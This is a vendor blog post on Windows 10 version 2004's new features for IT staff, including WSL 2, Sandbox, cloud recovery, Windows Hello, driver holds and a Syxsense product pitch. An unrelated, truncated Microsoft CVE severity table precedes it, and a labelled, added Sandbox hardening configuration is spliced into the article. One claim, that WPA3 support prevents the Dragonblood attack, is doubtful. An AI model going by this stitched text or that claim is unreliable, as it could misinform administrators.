CVE-2020-1348 Windows GDI Information Disclosure Vulnerability Important 5.5 No No No
CVE-2020-1194 Windows Registry Denial of Service Vulnerability Important 5.5 No No No
CVE-2020-1268 Windows Service Information Disclosure Vulnerability Important 5.5 No No No
CVE-2020-1220 Microsoft Edge (Chromium-based) in IE Mode Spoofing Vulnerability Important 5.4 No No No
CVE-2020-1241 Windows Kernel Security Feature Bypass Vulnerability Important 5.3 No No No
CVE-2020-1296 Windows Diagnostics & feedback Information Disclosure Vulnerability Important 5 No No No
CVE-2020-1315 Internet Explorer Information Disclosure Vulnerability Important 4.3 No No No
CVE-2020-1242 Microsoft Edge Information Disclosure Vulnerability Important 4.3 No No No
CVE-2020-1259 Windows Host Guardian Service Security Feature Bypass Vulnerability Important 4.3 No No No
CVE-2020-1329 Microsoft Bing Search Spoofing Vulnerability Important TBC No No No
CVE-2020-1225 Microsoft Excel Remote Code Execution Vulnerability Important TBC No No No
CVE-2020-1226 Microsoft Excel Remote Code Execution Vulnerability Important TBC No No No
CVE-2020-1321 Microsoft Office Remote Code Execution Vulnerability

Windows 10 2004: What IT Departments Should Expect

Microsoft has released Windows 10, version 2004. Find out the new features for security and performance that IT professionals should pay attention to.

Microsoft recently released Windows 10’s May 2020 Update. Codenamed 20H1, the spring release is referred to as “version 2004,” and includes a number of new features for security and performance.

Unlike the 1909 (Fall 2019) Update, which was closer to a service pack or cumulative update with few changes, this update includes many changes across various areas of the operating system. Organizations planning to deploy the latest release are strongly advised to review the list of new features (as well as the features being deprecated) and, as always, to test it first.

New Features in Windows 10 2004

New Cortana Experience

The Cortana app has shifted significantly, so if you are used to the digital assistant, be prepared.

The new version focuses mainly on productivity: the features for music, smart home control, and third-party options have been removed. Microsoft has also discontinued Cortana on Android and iOS and on unsupported Windows 10 versions. There are still improvements, including interface enhancements and better integration with email, calendars, and other Windows apps.

Windows Subsystem for Linux 2

The Linux subsystem, which has been part of Windows 10 for some time, has been substantially changed. It now runs entirely in a lightweight virtual machine managed by Windows. Shipping a full Linux kernel gives full system call compatibility, brings large performance improvements, and lets the kernel be updated through Windows Update.

Windows Sandbox Improvements

The Windows Sandbox was introduced last year with the spring release of Windows 10 1903 and lets users launch a disposable virtual device, running a minimal Windows 10 image, for safe testing. Microsoft has now rolled out features that further automate it, including support for configuration files, audio input enhancements, and better handling of administrative hotkeys.
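As an added example that is not part of the original post or Microsoft's documentation, the following Windows Sandbox configuration file (.wsb) uses the configuration-file support mentioned above to lock the sandbox down for examining an untrusted file: no network, no vGPU, the host folder mapped read-only, and the hardened RDP client session enabled. The host folder path is a placeholder you would replace with your own.

```xml
<Configuration>
  <!-- No virtual GPU: removes the GPU driver attack surface from the guest. -->
  <vGPU>Disable</vGPU>
  <!-- No network: a sample opened inside cannot call out or reach the LAN. -->
  <Networking>Disable</Networking>
  <!-- Run the sandbox session in protected client mode (AppContainer-isolated RDP client). -->
  <ProtectedClient>Enable</ProtectedClient>
  <!-- Do not share clipboard, printers, microphone or camera with the host. -->
  <ClipboardRedirection>Disable</ClipboardRedirection>
  <PrinterRedirection>Disable</PrinterRedirection>
  <AudioInput>Disable</AudioInput>
  <VideoInput>Disable</VideoInput>
  <!-- Cap guest memory so a misbehaving sample cannot starve the host. -->
  <MemoryInMB>4096</MemoryInMB>
  <!-- Expose the samples folder read-only; nothing written in the sandbox reaches the host.
       C:\Samples is a placeholder path, not one from the original post. -->
  <MappedFolders>
    <MappedFolder>
      <HostFolder>C:\Samples</HostFolder>
      <ReadOnly>true</ReadOnly>
    </MappedFolder>
  </MappedFolders>
  <!-- Open Explorer on the mapped folder when the sandbox starts. -->
  <LogonCommand>
    <Command>explorer.exe C:\Users\WDAGUtilityAccount\Desktop\Samples</Command>
  </LogonCommand>
</Configuration>
```

Save the file with a .wsb extension and double-click it; a fresh sandbox is created from the file every time and discarded on close.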

Cloud Recovery Option

Previous versions of Windows 10 offered a 'Reset this PC' recovery option that performs a local reinstall when corruption occurs. Starting with Windows 10 2004, this option allows not only a local reinstall but also a 'Cloud download', in which the files are delivered directly from Microsoft's servers (as long as the device has an adequate internet connection). Mac users have enjoyed this for quite some time, and Microsoft has finally stepped up.

Security Options

Windows Hello has been available for some time to let users sign in with biometrics or other passwordless methods, such as fingerprint, face scan, or PIN code. With Windows 10 2004, these options are now supported even when the device is booted into Safe Mode. This was most likely added because Windows Hello passwordless authentication can now be used entirely without passwords (when signing in with a Microsoft account). In another security improvement in 2004, Microsoft has expanded its FIDO2 security key support to “include hybrid Azure Active Directory (Azure AD)-joined devices, enabling even more customers to take an important step in their journey towards passwordless environments.”

Anyone running certain models of AMD processors will also be happy to know that 2004 includes its new Secured-core technology. Lastly, there is a new setting that allows apps to start back up when a user signs in or out. It supports registered desktop apps, but they start in a suspended state, minimized to the taskbar, to save resources. The setting is located in Sign-in options and is disabled by default.

The Rest of the Features

Notepad has shipped with Windows almost since the beginning, and it has finally received some new features: line numbers when word-wrap is on, a new Find experience when word-wrap is on, a notification for unsaved changes, text zoom, and new shortcuts.

Since Windows 10 began shipping Feature Updates, areas of the operating system carried over from Windows 7 have slowly been phased out: every new release adds more features to Settings and deprecates the old items. This version finally brings the Network Status page closer to parity with Control Panel. Wi-Fi 6 and WPA3 are now supported in 2004, preventing such attacks as DragonBlood and KRACK.

Just like Windows has handled it with Microsoft Office apps for years, there’s the new ability to automatically restore open UWP (Universal Windows Platform) apps, such as Calendar and Mail, after a reboot. There’s also an improved tablet experience for convertible PCs.

And for years, gamers and administrators alike have begged for the Task Manager Performance tab to support graphics card performance options. Windows now includes GPU performance metrics, just like other major components. It should be noted that although GPU performance is now monitored, thermal metrics are still not included.

Some Driver Issues

It should also be noted that the initial release of Windows 10 2004 did not come without a few hiccups, and this isn't anything new (Windows 10 1809, anybody?). There have been reports of bugs in various drivers, including peripherals and accessories such as Bluetooth and audio, as well as graphics and display issues. Fortunately for many, Microsoft already caught a number of these during Windows Insider testing and has placed compatibility holds on devices that may have affected drivers.

For example, certain audio drivers were highlighted early: “To safeguard your update experience, we have applied a compatibility hold on Windows 10 devices with affected Conexant or Synaptics audio drivers installed from being offered Windows 10, version 2004 or Windows Server, version 2004 until the driver has been updated,” Microsoft stated. There are also outstanding issues with Realtek Bluetooth drivers, Intel integrated GPUs, Thunderbolt, and older Nvidia display adapters. For administrators, it’s always recommended to test the Feature Update first in an environment that’s representative of the production environment to catch any potential issues.

Organizations, as well as consumers, that run Windows 10 version 2004 will have full update support for 18 months (support until December 14, 2021).

How Syxsense Can Help

Overall, trusting Windows Server Update Services (WSUS) or other third-party patching solutions may not bring these devices to a supported version successfully. Leveraging a cloud-based solution to bring older Windows 10 devices up-to-date ensures success and standardization, whether devices are inside or outside the network.

Syxsense Manage includes the ability to migrate managed devices to any desired version of Windows 10 through the use of a Feature Update task. Simply prepare end-user installation delay and reboot options, choose the devices to target, and select a time for the upgrade that works best for these target devices. A phased deployment approach is also recommended by the industry and is always easily done with Syxsense Manage.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.
